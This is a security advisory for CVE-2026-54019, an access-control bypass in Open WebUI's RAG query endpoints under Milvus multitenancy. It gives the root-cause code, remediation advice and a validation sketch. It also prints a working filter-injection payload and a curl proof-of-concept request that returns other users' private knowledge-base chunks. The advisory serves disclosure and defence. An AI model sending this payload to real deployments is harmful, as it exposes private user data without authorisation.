PT-2026-50591 · Pypi · Open-Webui

Published: 2026-06-17 · Updated: 2026-06-17 · CVE-2026-54019

CVSS v3.1: 6.5 (Medium)

Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

RAG ACL Bypass in Milvus Multitenancy Mode

Summary

This is a bypass of the fix for:
  • GHSA-h36f-rqpx-j5wx
  • CVE-2026-44560
  • "Unauthorized File and Knowledge Base Content Access via RAG Vector Search"

Open WebUI added collection-level ACL checks, but the patch can still be bypassed when Milvus multitenancy mode is enabled. The ACL allows unknown non-KB collection names as legacy/ephemeral collections. In Milvus multitenancy mode, that user-controlled collection name becomes a `resource_id` and is interpolated into a Milvus expression without escaping.

An authenticated non-admin user can query:

```text
x' or resource_id != '' or resource_id == 'x
```

This passes the Open WebUI ACL as an unknown collection, but Milvus evaluates:

```text
resource_id == 'x' or resource_id != '' or resource_id == 'x'
```

That returns private knowledge-base chunks belonging to other users.

Affected Configuration

Tested on:

```text
Open WebUI: v0.9.5, commit 3660bc00f
VECTOR_DB=milvus
ENABLE_MILVUS_MULTITENANCY_MODE=true
```

This is not a default-vector-store issue. It affects production deployments using Milvus multitenancy.

Impact

An authenticated low-privilege user can read private RAG / knowledge-base content they do not have access to. No victim interaction is required.

Root Cause

The ACL permits unknown collection names:

```python
# backend/open_webui/retrieval/utils.py
elif not await Knowledges.get_knowledge_by_id(name):
    validated.add(name)
```

Milvus multitenancy then treats the same name as `resource_id` and builds unsafe expressions:

```python
# backend/open_webui/retrieval/vector/dbs/milvus_multitenancy.py
expr=f"{RESOURCE_ID_FIELD} == '{resource_id}'"
```

Affected paths include:

```text
POST /api/v1/retrieval/query/collection
POST /api/v1/retrieval/query/doc
```

PoC

Request:

```bash
curl -s -X POST "$TARGET/api/v1/retrieval/query/collection" \
  -H "Authorization: Bearer $ATTACKER_TOKEN" \
  -H "Content-Type: application/json" \
  --data-binary @- <<'JSON'
{
  "collection_names": [
    "x' or resource_id != '' or resource_id == 'x"
  ],
  "query": "anything",
  "k": 10,
  "hybrid": false
}
JSON
```

Actual result: private chunks from other users' knowledge collections are returned.

Expected result: the request should be rejected with 403 or return no unauthorized content.

Remediation

  1. Do not allow arbitrary unknown collection names in user-controlled RAG query endpoints.
  2. Escape or parameterize Milvus expression values before building filters.
  3. Reject collection names containing quotes/control characters unless they match a known internal format.
  4. Add a regression test for this payload in Milvus multitenancy mode:
```text
x' or resource_id != '' or resource_id == 'x
```
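
A sketch of remediation items 2 to 4, added here as an example and not taken from Open WebUI's code: the interpolation pattern from the Root Cause section next to a validated and escaped builder, with the advisory's payload as the regression input. The allowlist pattern and all helper names are assumptions, and the backslash escaping assumes Milvus string-literal escape rules.

```python
import re

RESOURCE_ID_FIELD = "resource_id"  # field name as it appears in the advisory's snippet

# Assumed allowlist (hypothetical): letters, digits, '_' and '-', up to 128 chars.
# Tighten it to the internal collection-name formats the deployment actually uses.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,128}")

# The payload quoted in the advisory, used here only as a regression-test input.
ADVISORY_PAYLOAD = "x' or resource_id != '' or resource_id == 'x"


def build_expr_unsafe(resource_id: str) -> str:
    """The pattern from the advisory: raw interpolation into the filter."""
    return f"{RESOURCE_ID_FIELD} == '{resource_id}'"


def is_safe_collection_name(name) -> bool:
    """Reject quotes, whitespace, control characters and anything off the allowlist."""
    return isinstance(name, str) and _SAFE_NAME.fullmatch(name) is not None


def escape_string_literal(value: str) -> str:
    """Backslash-escape backslashes and quotes (assumed Milvus literal escaping)."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def build_expr_safe(resource_id: str) -> str:
    """Validate first, then escape anyway as defence in depth."""
    if not is_safe_collection_name(resource_id):
        raise ValueError("collection name rejected")
    return f"{RESOURCE_ID_FIELD} == '{escape_string_literal(resource_id)}'"


def unescaped_quotes(expr: str) -> int:
    """Count single quotes not preceded by a backslash.

    A single equality comparison against one string literal has exactly 2.
    """
    return len(re.findall(r"(?<!\\)'", expr))
```

A count above 2 from `unescaped_quotes` on a built filter means the value closed its own literal and added terms to the expression, which makes it a cheap assertion for the regression test in item 4.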

Fix

Missing Authorization


Weakness Enumeration

Related Identifiers

CVE-2026-54019
GHSA-P5CP-R7RG-QPXC

Affected Products

Open-Webui